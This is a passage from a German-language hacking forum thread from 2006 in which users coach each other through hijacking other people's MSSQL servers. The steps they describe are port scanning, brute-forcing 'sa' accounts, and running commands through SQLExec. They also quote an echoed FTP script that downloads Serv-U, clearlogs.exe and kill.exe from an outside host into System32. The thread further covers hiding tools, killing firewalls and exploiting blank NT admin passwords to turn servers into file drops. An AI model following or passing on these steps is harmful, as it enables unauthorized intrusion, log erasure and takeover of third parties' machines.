#27 29. Juni 2006 hmm ok ich sach mal hoffentlich haste recht so habe nun alle 5 server die ich gefunden hab getestet mit "SQLExec" un der echo methode Code: Echo Open 111.222.333.444 21>>FTP.txt Echo Test>>FTP.txt Echo Test>>FTP.txt Echo Binary>>FTP.txt Echo Lcd c:winntSystem32>>FTP.txt Echo GET Serv-U.exe>>FTP.txt Echo GET Serv-U.ini>>FTP.txt Echo Quit>>FTP.txt aber wenn ich die sachen eingegeben hab habsch keine antwort vom server bekommen Code: So jetzt Script starten. ftp -n -v -s:c:ftpscr.txt So jetzt müsst ihr paar Minuten warten. Man hat den Eindruck das Sqlexec abgekackt ist aber das ist nicht der Fall. Einfach warten. Wenn alles geuppt ist bekommt ihr ungefaehr diese Meldung: get serv-u.exe get serv-u.ini get clearlogs.exe get kill.exe get Fport.exe bei mir kommt entweder SQL_NO_DATA oder connection refused + Multi-Zitat Zitieren
#28 29. Juni 2006 geiler Comment @cool-max No risk no fun oder wie?! ^^ hehe Naja ich benutze auch kein Proxy oder besser gesagt habe keinen genutzt! Wenn du mssql und dann noch Asia scannst, dann passiert da nich soviel edit: Soweit ich weiß bekommt man da immer nur ein Ton zu hören wenn ein Kommand erfolgreich war. Oder war das nicht so?! (kein plan davon^^) Ich erkundige mich da mal, aber immer schön weiter scannern^^ + Multi-Zitat Zitieren
#30 30. Juni 2006 also wenn da SQL_ERROR oder so kommt dann heißt das glaube ich das einer den str0 schon gehackt hat und ihn selber so gesichert hat das mit ihn nicht mehr oder nur schwer nochmal hacken kann. also kannst du alle deine scans die du da hast vergessen^^ edit: an mYnon: no risk no fun das ist mein motto 8) + Multi-Zitat Zitieren
#31 30. Juni 2006 naja du kannst se nicht ganz vergessen nur musst du dafür noch Erfahrung mitbringen... Ich glaub das war irgendwas mit der Shell, das die gelöscht ist und du eigentlich blind und noch nichtmals mit Garantie für Erfolg, alles blind schrieben musst oder so.. irgendwie war das so.. Aber jeder anfang ist schwer, lass dich nicht unterkriegen^^ + Multi-Zitat Zitieren
#32 30. Juni 2006 @mYnon danke und unterkriegen lass ich mich net ist hallt alles ein wenig stressieg da ich nicht mehr machen kann in der zeit zb. cs zocken oder so dennn ich will ja zu erfolg kommen und scanne ca 100-150 treads + Multi-Zitat Zitieren
#33 30. Juni 2006 Kannst ja pc über nach laufen lassen oder wenn du nicht da bist.. Ja das mit lokal scannen ist halt ein bisschen blöde... Aber sobald du deinen ersten scanstro hast, gehts voll ab^^ + Multi-Zitat Zitieren
#34 30. Juni 2006 naja ich hoffe nur das mein alice net rumspackt und naja er läuft über nacht aber auch wenn ich den ganzen tag am rechner sitze und ja bis der stro da ist dauert das noch en bissl ^^ ich hoffe net mehr so lang grrr + Multi-Zitat Zitieren
#35 30. Juni 2006 wie gesagt ansonsten wenn du was gutes hast anbieten vieleicht haste glück + Multi-Zitat Zitieren
#36 30. Juni 2006 löl ^^ hab nichts zumindestens nicht gutes^^ habe erst gerade 250giga pladde mit stuff geschrottet wegen dem scheiss macos_x bin erst wieder am sammeln edit: hab en server mit 2 cleanen accs gefunden Code: Vulnerability netbios-ssn (139/tcp) [b]NT-Server-Password - [/b]NT-Server-Password: "admin/[Blank password]" Vulnerability netbios-ssn (139/tcp) [b]NT-Server-Password - [/b]NT-Server-Password: "pailin/[Blank password]" was kann ich damit anfangen ? + Multi-Zitat Zitieren
#37 30. Juni 2006 Mh.. das scheint mir ja nach NTPW auszusehen, da hat irgendwer in diesem Thread auch schon was drübergeschrieben,musste halt mal zurückblettern und gucken Wenn das nicht der Fall ist, kA mfg edit:Hab mal gegooglt nach Netbios hacking: ein Tut - Ist leider auf Englisch aber man kann es ja mal ausprobieren ^^ P.S.: Nach was scannst du denn alles?!" + Multi-Zitat Zitieren
#38 30. Juni 2006 nach allem was geht ich scanne mit X-Scan v3.3 nach sql ntpw und neben bei scanne ich mit ScanSql (aber da hab ich kein glück) + Multi-Zitat Zitieren
#39 30. Juni 2006 Schau mal nen Post drüber, da ist was ber NEtbios hacking in einem englischen Tut.. Einfach mal google anschmeißen, auf english findest meistens was^^ + Multi-Zitat Zitieren
#40 30. Juni 2006 hmm ich hab über nacht mal nach mssql server gescannt und hab auch 5 results, müsste die jetzt noch bruten aber ich weiß nich direkt wie das geht? =/ also wissen schon nur wie ich es zu 100% mache nich =/ naja wäre nett wenn mir jemanden helfen könnte, gern auch per icq oder msn geht schneller, und ich denke das ich es auch schnell verstehen würde =/ hab auch schon im board und im netz gesucht aber irgendwie nich direkt was gefunden =/ (oder ich bin blind) ^^ hoffe meldet sich jemand! =) Gr33tz+Thx PhyT0n + Multi-Zitat Zitieren
#41 30. Juni 2006 hmm also ich hab damals nur von @ home gescannt und die irgendwelche probs gehabz weder beim scannen noch beim bruten aber egal is ja eure meinung also ich würde sagen für den anfang ein fach mal mit dfind oder so nach offenen 1433 ports scannen die dann mit sqlck bruten dann mit sqlexec sehen ob kein error weil den wirst du wohl noch nicht weg bekommen wenn kein error filez druff und server starten wenn es immer noch nicht geht firewall killen oder sehen ob router dazwischen wenn du dir net sicher bist ob nen router da is einfach dein prog(serv-u,etc.)mal auf port 21 laufen lassen wenn es immer noch net geht nächster scann usw. + Multi-Zitat Zitieren
#42 30. Juni 2006 Open Port 1433 bruten [MSSQL] bitte^^ häääääääääääää?? hast du schon mal gelesen was du da schreibst?? next time plz verständlicher + Multi-Zitat Zitieren
#43 30. Juni 2006 Der hat ne KUrzbeschreibung von den einzelnen Schritte gemacht Dfind = Portscanner der über DOS läuft bzw. nur über ne Commandline(?) Also er guckt nur ob der Port offen ist und nicht ob ein Weakaccoutn sprich wie z.b. sa vorhanden ist. Dann Sqlck ist nen SQLbruter wie der Name schon sagt. Auch über Commandline(?). Die benutzt man meistens(denk ich mir mal so) um per remote nach sqls zu scannen/bruten. Ja sqlexec müsste eigentlich wissen was das ist ^^ Und dann hat er halt beschrieben, dass man gucken sollte ob der SQL ne SQL Error hat und wenn nicht einfach das machen was auch in den Tuts steht. mfg @molli Die Zeiten haben sich halt geändert + Multi-Zitat Zitieren
#44 30. Juni 2006 So also hab alles gemacht und hab 2 die sind total in ordnung,kein error etc. und gebrutet sind die auch! einen möchte ich falls es möglich is als scanstro benutzen und den anderen für stuff nur wie secure ich die dsa mir die auch keiner wegnehmen kann? und wie bau ich mir darauf nen scanstro und nen schönen ftp server? =/ hab ihr mal was gesehen find das aber leider nich mehr hoffe mir kann dabei noch jemand helfen =/ gr33tz+thx, 10ner wurden verteilt und gibts weiterhin für jede hilfe!! //Edit: hab wohl was übersehen, ist nur einer der in ordnung ist der andere zeigt mir leider nen error an =/ aber dafür hat er schöne festplatten wie z.b. c,d,e,f,g ^^ werd nachher mal das tut durchgehen und das machen, will jetzt erstmal bissle zocken *g* gr33tz+thx PhyT0n + Multi-Zitat Zitieren
#45 30. Juni 2006 Guck am besten in der TutSektion bei Leecher Upper Support... EInfach Stro securen und haxxon von mssql suchen Und hier auch ein Tut vom Haxxen bis zum securen - + Multi-Zitat Zitieren
#46 30. Juni 2006 leichter gesagt als getahn. man macht das ja mit Fport.exe richtig? wennn ich die immer ausführen will dann sagt er das ich ein admin oder so sein muss um das auszuführen X( + Multi-Zitat Zitieren
#47 30. Juni 2006 Dann nimm openports.exe, mit folgendem aufruf: Code: openports -lines -fport Zu den SQLErrors: Es gibt verschiedene Arten, wenn nur die xp_cmdshell weg ist, dann kann man die einfach neubauen. Wenn aber DLLs fehlen (xplog70.dll, odsole.dll) dann kannst du ihn vergessen (Ziemlich schwer die zu hacken) + Multi-Zitat Zitieren
#48 30. Juni 2006 ok ich hab en server ^^ muhaha² nun muss ich nurnoch versuchen den ftp zum laufen zu bekommen ...wo bekomme ich die "fport" und die "openports.exe" her?? und ich hab unter net start gesehen das der ne nod antivirus prog drauf hat aber wie kann ich denn auf den server zu greifen und scannen lassen?? axo und der server hatt vnc drauf und sonn zeuch ist es möglich die psses zu ändern oder en 2ten admin an zu legen?? oder das nt pass auszulesen? + Multi-Zitat Zitieren
#49 30. Juni 2006 Mh... mit einer Shell sprich SQLexec kannst auf den Server zugriefn.. weiter kann ich dir leider nicht helfen^^ Ehm.. und zum scannen.. Du musst ja erst den Serv-U zum laufen bekommen, dann connectest mit den Daten per FTp Progi auf deine Serv-u und dann lädst du die ganzen Dateien wie SQLck und dfind hoch aber auch noch hidden32.exe(dfind,sqlck verstecken) und kill.exe(prozess killen) + Multi-Zitat Zitieren
#50 30. Juni 2006 ahhhhhhhhhhhhh ftp läuft !!!!!!!! muhahahaha goil so nun noch den rest ^^ [ironie] lol und wieder down [/ironie] nun ist der ftp on aber ping kann ich net lol + Multi-Zitat Zitieren